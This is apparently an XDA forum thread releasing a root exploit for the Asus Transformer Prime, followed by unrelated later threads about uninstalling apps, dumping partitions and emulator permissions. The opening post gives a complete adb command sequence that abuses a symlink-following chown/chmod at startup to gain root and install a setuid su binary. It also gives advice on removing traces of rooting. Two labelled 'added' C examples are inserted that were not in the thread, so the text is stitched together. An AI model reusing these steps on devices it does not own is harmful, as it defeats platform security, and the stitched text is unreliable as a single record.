I have your ICS root ready, how about we call it TPSparkyRoot. I based my research on code written by Dan Rosenberg (similar to what jchase did with NachoRoot in the fact that chown/chmod follows symlinks even when set during startup), here is a link to that research http://vulnfactory.org/blog/2011/08/25/rooting-the-droid-3/
**UPDATE**
Android's source has been patched so that future OEMs can not leave this hole open by accident.
https://android-review.googlesource.com/#/c/36035/
**UPDATE**
This method has been shown to work on the HTC One X see forum
http://forum.xda-developers.com/showthread.php?t=1644167
Theoretically this should work on Honeycomb versions of the Prime as well, since the Honeycomb update is where I found the flaw that is being exploited. I have confirmed this works on my Prime.
**UPDATE**
This exploit does not currently work for the latest ICS update released (v9.4.2.11 on 1/18/2012). You can use OTA Rootkeeper to backup your root prior to updating using OTA, which I have confirmed to work on my device, (this may not work if you push the update manually).
https://market.android.com/details?id=org.projectvoodoo.otarootkeeper
For the devs out there, it does not honor the ro.kernel.qemu=1 setting within the local.prop because it is already set to blank by that point by the build.prop
You must have your Prime set up to use adb and your adb location contained in your path variable (windows) or unzip the files from my zip into that directory before running.
**UPDATED**
If you are having issues getting adb working, make sure ASUS Sync is not running; if it is, then kill it.
adb shell mv /data/local/tmp /data/local/tmp.bak
adb shell ln -s /data /data/local/tmp
adb reboot
adb shell rm /data/local.prop > nul
adb shell "echo \"ro.kernel.qemu=1\" > /data/local.prop"
adb reboot
adb shell id
//IF ID IS 0/root THEN CONTINUE, ELSE START OVER>
adb remount
adb push su /system/xbin/su
adb shell chown 0.0 /system/xbin/su
adb shell chmod 06755 /system/xbin/su
//UNDO EVERYTHING EXCEPT su
adb shell rm /data/local.prop
adb shell rm /data/local/tmp
adb shell mv /data/local/tmp.bak /data/local/tmp
adb reboot
**UPDATE** As jchase stated "If your device "bootloops" don't stress, just follow through with the commands as it "loops" ro.kernel.qemu can do funky stuff." I did notice this in my rooting but just assumed it was normal as this is my first use of adb.
**UPDATE2**
If you get a permissions error on the call
adb shell "echo \"ro.kernel.qemu=1\" > /data/local.prop"
then you may try
adb shell rm /data/local.prop
And then try the echo command again. This may be due to having rooted prior without cleaning up properly. Thanks to Franky_402 for this piece of info.
I have updated the batch file to include this step, it should still be fine for those who are not having the issue as well.
I have attached a zip file containing the su and a bat file for a more automated process (it just pauses during reboots, don’t hit go until it’s done rebooting). Or, you can run the commands manually and get the su file from the origin http://downloads.androidsu.com/superuser/su-bin-3.0.3.2-efghi-signed.zip
Finally, install Superuser to make it all work https://market.android.com/details?id=com.noshufou.android.su
**UPDATE** UNROOT
There are multiple ways to unroot now that you have root access already (all you need to do is remove the su file; so you could potentially skip all the steps before the remount and just add the local.prop manually using a file manager and then reboot).
The way most similar to how you rooted would be to follow all of the steps above, but replace these 3 lines
adb push su /system/xbin/su
adb shell chown 0.0 /system/xbin/su
adb shell chmod 06755 /system/xbin/su
with this line
adb shell rm /system/xbin/su
This will remove the actual root, but it would leave behind any apps that you have given root access to or any files that those apps changed themselves (i.e. RootKeeper backs up the su file and the backup would need to be removed). If you had anything like this you would need to clean up that first before unrooting because it is a dead giveaway that it was rooted.
Viperboy should be releasing his tool shortly that utilizes this method, if you would like a one click process that installs apps along with it (superuser, busybox). I’m guessing it installed them to the root apps directory so these also would need to be removed when unrooting as well (i.e. if you root using his new tool you should unroot using it as well).
**UPDATED** Remove PayPal link in favor of link over there <-
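Added illustration (not part of the original post, and not the code of the Android patch linked above): the root cause the post names, a privileged chmod that follows a symlink, next to a hardened form that opens the path with O_NOFOLLOW and changes the mode through the file descriptor. The temporary directory and the names `expected` and `protected` are constructed for the demo.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Weak pattern: the mode change lands on whatever the path resolves to. */
int unsafe_chmod(const char *path, mode_t mode) {
    return chmod(path, mode);
}

/* Hardened pattern: refuse a symlink at the final path component, then
 * change the mode of the object that was actually opened. */
int safe_chmod(const char *path, mode_t mode) {
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd < 0)
        return -1;                      /* errno is ELOOP for a symlink */
    int rc = fchmod(fd, mode);
    close(fd);
    return rc;
}

/* Constructed scenario: "expected" is the path a privileged startup step
 * will chmod; it has been replaced by a symlink to "protected" (0700).
 * Returns the mode of "protected" after the chosen helper has run. */
int demo(int use_safe) {
    char dir[] = "/tmp/nofollow-demo-XXXXXX";
    char target[64], lnk[64];
    struct stat st;
    if (!mkdtemp(dir)) return -1;
    snprintf(target, sizeof target, "%s/protected", dir);
    snprintf(lnk, sizeof lnk, "%s/expected", dir);
    if (mkdir(target, 0700) || chmod(target, 0700) || symlink(target, lnk))
        return -1;
    if (use_safe) safe_chmod(lnk, 0777); else unsafe_chmod(lnk, 0777);
    int mode = stat(target, &st) == 0 ? (int)(st.st_mode & 07777) : -1;
    unlink(lnk); rmdir(target); rmdir(dir);
    return mode;
}

int main(void) {
    printf("chmod() through symlink -> target mode %o\n", (unsigned)demo(0));
    printf("O_NOFOLLOW + fchmod()   -> target mode %o\n", (unsigned)demo(1));
    return 0;
}
```

O_NOFOLLOW only covers the last path component, so a parent directory that an unprivileged user can write to still needs separate handling.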
Yes, as it says, I went from the same base exploit that was shown by Dan and was the base for jchase as well.
The commands more than likely are but the exploit must be different or jcase's root would still be working... Thanks OP!!!
EDIT: He didn't "ask" for donations just gave a link since he doesn't have the donate button <<over there
Not mine at all, props to this guy! Send him some bones.
Yes, thanks, I did not realize that there was a donate button as I am still learning this forum.
This root is confirmed!
If your device "bootloops" don't stress, just follow through with the commands as it "loops" ro.kernel.qemu can do funky stuff.
Good ****.
sparkym3 said:
Yes, thanks, I did not realize that there was a donate button as I am still learning this forum.
Yeah it's in the User Control Panel on the top of the forum
"Reported" your thread to a mod, so he can move it to the dev section
And welcome to XDA Don't let the trolls take your love for android
jcase said:
This root is confirmed!
If your device "bootloops" don't stress, just follow through with the commands as it "loops" ro.kernel.qemu can do funky stuff.
Good ****.
OP, maybe put that in the OP, so users don't panic
Moved to development.
Holy smoke, it works....
jcase said:
Not mine at all, props to this guy! Send him some bones.
As the main man says. Give credit when due. It's not his. and give the guy props and if you wish to donate donate.
This is why this android community is crap. because everyone trolls. If it was jcase's he'd release it. not someone else. and I'm sure as hell he wouldn't be saying these things 'like give the guy some bones'
rhcp0112345 said:
As the main man says. Give credit when due. It's not his. and give the guy props and if you wish to donate donate.
This is why this android community is crap. because everyone trolls. If it was jcase's he'd release it. not someone else. and I'm sure as hell he wouldn't be saying these things 'like give the guy some bones'
Biggem isn't really a troll, he's obv just got out of the wrong side of the bed ... I'm sure he'll take that back.
Danny-B- said:
Biggem isn't really a troll, he's obv just got out of the wrong side of the bed ... I'm sure he'll take that back.
Also nothing wrong with asking for donations.
YOU ROCK. donations to you and jcase after payday
You would all post this WHILE I'm at work, have my prime with me, but not my charger! lol. I'll DEFINITELY check it out when I get home.
disturb3d1 said:
You would all post this WHILE I'm at work, have my prime with me, but not my charger! lol. I'll DEFINITELY check it out when I get home.
Dude mine should be here in 9 hrs
I might do an unboxing vid using my photon
Wait a minute, chainfire is paying attention to the thread, that only means good things. Please tell me you're gonna dev some for this device
Sent from my SGH-T959 using XDA App
Not going good for me. I'm on Ubuntu with working adb. Copied su to home directory and running all commands from there. When I get to adb shell "echo \"ro.kernel.qemu=1\" > /data/local.prop", I get /system/bin/sh: cannot create /data/local.prop: Permission denied. So I never get the right id to continue. Anyways, please help. Thanks
Any chance in the future this can be converted to an apk to install on Prime or a One-click method, per se?
I'm trying to uninstall packages with the following command:
Code:
adb shell
su
pm uninstall tunein.player
But it just reports failure. No explanation why!
I tried the following command beforehand:
Code:
adb shell
su
pm disable tunein.player
Which works fine, but doesn't make the first command work any better.
Any ideas what the problem is? Obviously, I'm rooted.
Any help is appreciated!
Thanks,
Billy
Please use the Q&A Forum for questions &
Read the Forum Rules Ref Posting
Moving to Q&A
My apologies. I should have realized.
Thanks,
Billy
Is it a system app? Android doesn't allow you to uninstall system apps, just disable them.
shadowofdarkness said:
Is it a system app? Android doesn't allow you to uninstall system apps, just disable them.
That could be it. It's AT&T Bloatware that I'm trying to uninstall. That's probably considered "system".
Thanks a bunch for the reply!
Billy
Hello
I have a samsung galaxy s5 SM-G900W8 ( marshmallow )
and am puzzled as to why
mount /dev/block/mmcblk0p15 tmp_mnt
is giving me a 'Invalid argument'
where tmp_mnt is a directory that I have made
and we have in /dev/block/platform/msm_sdcc.1/by-name:
boot -> /dev/block/mmcblk0p15
I wish to see if something like boot.img is in there
Bruce
brucembeach said:
Hello, I have a samsung galaxy s5 SM-G900W8.....
I don't have this variant but, your best bet is to post this question within the following Q&A thread that's specific to your device and variants.
https://forum.xda-developers.com/showthread.php?t=2700073
Good Luck!
~~~~~~~~~~~~~~~
I DO NOT provide support via PM unless asked/requested by myself. PLEASE keep it in the threads where everyone can share.
Thanks for the reply. I'm new to the forum and
wasn't sure where to put my query. In any case the
answer came to me shortly after my post, which I
believe is generic to all android devices, except
that things like /dev/block/mmcblk0p15 have to be
adjusted for the specific device.
The reason I was getting 'Invalid argument' from
the mount command is that there is no filesystem
on '/dev/block/mmcblk0p15' and hence it can't be
mounted. My guess is that at boot time the system
doesn't know anything about filesystems and knows
just enough to send raw low level commands to the
storage medium to read the boot file, disassemble
it and pass control to it.
Here you need to be rooted. If you execute the
commands from:
** adb shell
dd if=/dev/block/mmcblk0p15 of=/storage/C37F-1BE2/test_boot.img
** and some host
adb pull /storage/C37F-1BE2/test_boot.img
you will have just downloaded a backup of the boot
image for your android, and the same applies for
the recovery. With suitable tools the
test_boot.img breaks down to a kernel and a
ramdisk.cpio.gz and the ramdisk.cpio.gz can be
decompressed to the ramdisk
bruce
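Added example (not from the thread): a header check for a dumped boot partition such as the `test_boot.img` above, showing where the kernel and ramdisk sit inside the image. It assumes the classic mkbootimg header layout (magic, section sizes and page size in the first 40 bytes); any further vendor sections are ignored, and the sample header values are constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct boot_layout {
    uint32_t page_size, kernel_size, ramdisk_size, second_size;
    uint64_t kernel_off, ramdisk_off, second_off, end_off;
};

static uint32_t le32(const uint8_t *p) {
    return p[0] | p[1] << 8 | p[2] << 16 | (uint32_t)p[3] << 24;
}
static uint64_t padded(uint32_t size, uint32_t page) {  /* round up to pages */
    return ((uint64_t)size + page - 1) / page * page;
}

/* Returns 0 on success, -1 for bad magic or page size, -2 when the declared
 * sections do not fit in image_len bytes (truncated dump, wrong partition). */
int parse_boot_header(const uint8_t *hdr, size_t hdr_len, uint64_t image_len,
                      struct boot_layout *o) {
    if (hdr_len < 40 || memcmp(hdr, "ANDROID!", 8) != 0) return -1;
    o->kernel_size  = le32(hdr + 8);
    o->ramdisk_size = le32(hdr + 16);
    o->second_size  = le32(hdr + 24);
    o->page_size    = le32(hdr + 36);
    if (!o->page_size || (o->page_size & (o->page_size - 1))) return -1;
    o->kernel_off  = o->page_size;      /* the header occupies page 0 */
    o->ramdisk_off = o->kernel_off + padded(o->kernel_size, o->page_size);
    o->second_off  = o->ramdisk_off + padded(o->ramdisk_size, o->page_size);
    o->end_off     = o->second_off + padded(o->second_size, o->page_size);
    return o->end_off <= image_len ? 0 : -2;
}

/* Constructed sample: 5000-byte kernel, 3000-byte ramdisk, 2048-byte pages. */
void sample_header(uint8_t hdr[40]) {
    memset(hdr, 0, 40);
    memcpy(hdr, "ANDROID!", 8);
    hdr[8] = 0x88; hdr[9] = 0x13;       /* 5000 = 0x1388 */
    hdr[16] = 0xB8; hdr[17] = 0x0B;     /* 3000 = 0x0BB8 */
    hdr[37] = 0x08;                     /* 2048 = 0x0800 */
}

int main(void) {
    uint8_t hdr[40]; struct boot_layout b = {0};
    sample_header(hdr);
    int rc = parse_boot_header(hdr, sizeof hdr, 16u << 20, &b);
    printf("rc=%d kernel@%lu ramdisk@%lu\n", rc,
           (unsigned long)b.kernel_off, (unsigned long)b.ramdisk_off);
    return 0;
}
```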
Hello, I am a newbie working with Android Studio so thank you in advance for your patience. I am attempting to restore a backup file from an LG device onto an emulator device. In the process I am facing an issue I can't identify. To start the emulator I continue getting a permissions denied msg.
If I run the command "sudo chown ubuntu /dev/kvm" the permissions issue is corrected. It then happens again later and I can't figure out why? Are the permissions resetting for some reason?
richey75 said:
Hello, I am a newbie working with Android Studio.......
I haven't used this in quite some time but, you may find the following threads helpful for what you are looking for. Don't be afraid to ask for some member guidance within one of them too.
https://forum.xda-developers.com/showthread.php?t=1599005
https://forum.xda-developers.com/showthread.php?t=3698584
Good Luck!
~~~~~~~~~~~~~~~
I DO NOT provide support via PM unless asked/requested by myself. PLEASE keep it in the threads where everyone can share.
Hi there,
Adb is installed on the external disk and the device was rooted.
When I ran
Code:
adb pull /dev/block/mmcblk0p43 43.img
it returned
Code:
adb: error: remote object '/dev/block/mmcblk0p43' does not exist
mmcblk0p43 is the userdata partition of the device.
However,
Code:
adb shell "su -c cat /dev/block/mmcblk0p43" > 43.img
managed to pull mmcblk0p43 into the external disk.
Why did adb pull /dev/block/mmcblk0p43 43.img fail to pull userdata partition?
Thanks in advance.
we are running in circles...
adb pull /dev/block/... requires 'adb root'
aIecxs said:
@wenyendev the answer applies to all your following questions:
adbd cannot run as root in production builds. you have three options. 1) use adb root in TWRP recovery mode. 2) use insecure adbd daemon 3) use adb shell su shell instead. that's it.
aIecxs said:
we are running in circles...
adb pull /dev/block/... requires 'adb root'
Thanks for your reply.
But how could you expect me to know in advance that adb pull command requires adb root?
Because you already did...
We expect you can remember your previously working commands (you have written in post #1
in the quoted thread just to name example):
wenyendev said:
In addition
adb pull /dev/block/mmcblk0p43 43.img
It returned
adb: error: remote object '/dev/block/mmcblk0p43' does not exist
[...]
adb pull /dev/block/mmcblk0p43 43.img worked.
So how come you're asking about the exact same command again just 7 days later?
I have asked you to read old thread(s) for good reason.
aIecxs said:
please stop posting multiple threads.
please start reading answers in old threads.
While it may be true that by opening new threads you may get more attention, please understand that threads on XDA are problem-focused, not question-based. This is not a Q&A site where each single minor issue belongs to a new question (and even on Q&A sites they would just close your repeating questions as duplicates).
This is a forum where you should keep your problem in one single thread, avoid spreading pieces of information over multiple threads.
your issue is to recover deleted files from unencrypted rooted device. do not open new thread for every little step, ask your questions in the same thread that belongs to the (real) problem.
You will benefit when you're focused to keep every information in one thread. Other people trying to help will read the history of what has already been asked, and can offer better help.
kindly read this post
*** read before you post ***
I am not to be embroiled myself in heated arguments here.
Thanks again for your answer.